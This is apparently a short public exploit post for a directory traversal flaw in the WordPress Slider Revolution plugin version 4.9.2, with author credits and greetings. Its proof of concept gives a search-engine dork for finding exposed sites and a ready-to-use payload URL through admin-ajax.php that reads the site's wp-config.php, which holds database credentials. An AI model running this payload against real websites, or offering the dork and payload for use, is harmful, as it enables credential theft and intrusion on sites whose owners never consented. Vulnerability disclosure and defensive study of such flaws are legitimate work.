WordPress Slider Revolution plugin version 4.9.2 suffers from a directory traversal vulnerability.
b974aee33a66e29925be0ab29843b305b114f9a63e635ad75ca2c10d50af3474====================================================================================================================================
| # Title : WordPress - Slider Revolution 4.9.2 Directory Traversal Vulnerability |
| # Author : indoushka |
| # Tested on : windows 10 Français V.(Pro) / browser : Mozilla firefox 66.0(64-bit) |
| # Vendor : https://www.sliderrevolution.com/ |
| # Dork : index of revslider\backup |
====================================================================================================================================
poc :
[+] Dorking İn Google Or Other Search Enggine.
[+] Use payload : /wp-admin/admin-ajax.php?action=revslider_show_image&img=../wp-config.php
[+] http://127.0.0.1/comunicacioninternacomuy/sitio/wp-admin/admin-ajax.php?action=revslider_show_image&img=../wp-config.php
Greetings to :=========================================================================================================================
|
jericho * Larry W. Cashdollar * brutelogic* hyp3rlinx* 9aylas * shadow_00715 * LiquidWorm * thelastvvv *Zigoo.eg |
|
=======================================================================================================================================